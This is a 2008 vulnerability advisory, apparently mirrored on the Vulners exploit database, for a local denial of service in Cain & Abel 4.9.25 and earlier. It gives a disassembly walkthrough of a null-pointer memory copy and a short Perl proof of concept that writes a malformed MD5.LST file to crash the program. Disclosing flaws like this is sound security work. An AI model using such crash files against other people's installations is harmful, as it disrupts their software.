`Title: Cain & Abel <= 4.9.25 Local Denial Of Service
Site: http://www.oxid.it/cain.html
Date: 15.12.2008
Author(s): Glafkos Charalambous
glafkos[at]astalavista[dot]com
George Nicolaou
ishtus[at]astalavista[dot]com
Technical Description:
0042DAD1 56 PUSH ESI ; length
0042DAD2 57 PUSH EDI ; hash
0042DAD3 E8 686A1000 CALL dmp_.00534540 ; check_validity(char *hash,int length) return allocated space offset
0042DAD8 68 C8010000 PUSH 1C8
0042DADD 8BE8 MOV EBP,EAX ; Take the return offset from check_validity() and store in EBP
Function at 0x534540 returns EAX = 00000000 if length >= 1 and any of the characters in a hash are not hexadecimal OR it
returns a memory pointer
0042DB19 8BF5 MOV ESI,EBP ; ESI = EBP
0042DB1B F3:A5 REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS:[ESI] ; Crash if ECX != 00
0042DB1D 8BC8 MOV ECX,EAX
0042DB1F 83E1 03 AND ECX,3
0042DB22 F3:A4 REP MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI] ; Crash
AT 0042DB1B
ECX=00000004 (decimal 4.) (REP counter)
DS:[ESI]=[00000000]=???
ES:[EDI]=[01500B48]=00000000
(note that if ECX = 00000000 (counter), then the crash occurs at 0042DB22)
Therefore as long as the hash contains one non-hexadecimal character and its length is greater than 2, cain crashes.
Similar issues exist in other LST files
POC Code:
#!/usr/bin/perl
#
# Author(s)
# Glafkos Charalambous [glafkos at astalavista dot com]
# George Nicolaou [ishtus at astalavista dot com]
#
# Title Cain & Abel <= 4.9.25 Local Denial Of Service
# Get your copy: http://www.oxid.it/cain.html
# Date 15.12.2008
use strict; use warnings;
my $evil = "amVsZW5hdnVrb3ZpYzIwMDBAeWFob28u";
my $n = "\x09" x 2;
# You can also try MD2/MD4 LST
open(my $LST, "> MD5.LST");
print $LST $evil.$n;
close($LST);
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation